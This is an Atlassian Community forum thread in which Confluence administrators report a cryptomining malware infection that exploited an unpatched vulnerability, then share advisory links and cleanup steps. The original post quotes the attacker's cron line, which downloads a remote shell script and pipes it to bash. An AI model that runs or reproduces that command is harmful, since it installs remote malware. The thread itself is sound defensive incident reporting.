Forums
Home Product Q&A Discussion groups Articles Ask a question Search
Learning
Events

Forums

Articles
Create
cancel
Turn on suggestions
Showing results for 
Search instead for 
Did you mean: 
Product Q&A
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

Mining malware and DDOS attack to remote host from Confluence server

Pamela Dalton
Pamela Dalton
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
September 2, 2021

We are running Confluence 7.8..1 in AWS. This morning Amazon sent us a notice that our server was implicated in activity that resembles a Denial of Service attack.  While investigation we say that an lot of entries in the logs for an anonymous user trying to access /rest/tinymce/1/macro/preview.  We searched Confluence support and found a ticket that mentioned being hacked by malware. From that and other sources we found that we had mining malware installed on our server.  We killed the kdevtmpfsi and kinsing processes that were running under the confluence user.  We found a cronjob for confluence that had the following:

* * * * * curl http://195.3.146.118/cf.sh | bash > /dev/null 2>&1

We found the mining files in our /tmp directory along with udp, syna, main, libsystem.so, gates.lod and conf.n.  We deleted the files and then created read-only files so they could not be created again.

In the support ticket we found, https://community.atlassian.com/t5/Confluence-questions/How-come-my-confluence-installation-was-hacked-by-Kerberods/qaq-p/1054605, this issue was fixed after 6.9.1. How do we have the issue with 7.8.1? We have changed our load balancer to only allow access from our network for now.  What can we do to make sure this doesn't happen again when we open it back up?

Answer
Watch
Like # people like this
6275 views

6 answers

2 accepted

2 votes
Answer accepted
Kent Brodie
Kent Brodie
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
September 2, 2021

Per a link mentioned above a little bit:

https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

This appears to be the attack vector, and it's addressed in the latest versions (see article).   We were one minor version below (with a planned upgrade tomorrow, go figure).

The malware was a stupid miner; it basically creates a crontab file under the confluence user, and dumps code into a dir canned  ".javae" under /tmp.

Fun stuff.

I did the update immediately (to 7.13.0) and am keeping a watchful eye.

Reply
1 vote
Answer accepted
Sebastian Hutter
Sebastian Hutter
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
September 3, 2021 edited

Please follow the guide in the Confluence advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Download the cve-fix script to your server, stop confluence, execute the script and start confluence again. If possible create a backup of the installation directory first or create a snapshot of the disk.

We faced the same issues and also received the abuse reports from AWS. Executing the script as listed in the Advisory will close the the open security hole.

 

We found files and entries here

/home/confluence/.xmrig.json

/tmp/.javae

/var/spool/cron/confluence

 

Where confluence is the name of the system user under which the confluence service is running.

If your confluence system wasn't running as root user the potential attack vector is limisted to places where the confluence user has write access too (tmp, home dir, confluence install dir)

 

Reply
2 votes
Kent Brodie
Kent Brodie
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
September 2, 2021

same.  We're on 7.12, and this hit us this morning.    I followed steps from the original article (2019):

disabled webdav

disabled Widget connector

removed all the goodies from /tmp

created a new empty root-owned read-only cron file "confluence".

Hope to seea fiix for this REAL SOON

Reply
2 votes
Lexum Informatique Juridique
Lexum Informatique Juridique
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
September 2, 2021 edited

Same. We believe we were a victim of this vulnerability: https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

If anybody finds out what this malware is, I'd like to know if it was a simple miner of it was designed to exfiltrate information or credentials.

Reply
1 vote
Kristian
Kristian September 2, 2021

We are experiencing this same issue as well and have been getting Amazon emails regarding denial of service attacks since this morning. Not sure what steps to take to resolve this. Any help appreciated!

View More Comments
neizves
neizves
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
September 2, 2021

I am not sure, but it looks like this kind of miner https://vms.drweb.com/virus/?i=19722604&lng=en , similar issues and fixes were found here: https://gist.github.com/yoyosan/5f88c1a023f006f952d7378bdc7bcf01 and here https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu

But virus itself can be modified, so it can be not enough actions to completely remove it.

Like • Kristian likes this
Reply
1 vote
neizves
neizves
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
September 2, 2021

Got the same issue since yesterday. Restored VM from backup, but still want to be sure that it is not going to happen again.

Reply

Suggest an answer

Log in or Sign up to answer
Confluence
Confluence
DEPLOYMENT TYPE
SERVER
VERSION
7.8.1
TAGS
AUG Leaders

Atlassian Community Events

Community
Forums
FAQs Forums guidelines
Learning
About learning Resources
Events
Copyright © 2025 Atlassian
Privacy Policy Terms Security
Welcome illustration

Welcome to the new Atlassian Community

Online forums and learning are now in one easy-to-use experience.

By continuing, you accept the updated Community Terms of Use and acknowledge the Privacy Policy. Your public name, photo, and achievements may be publicly visible and available in search engines.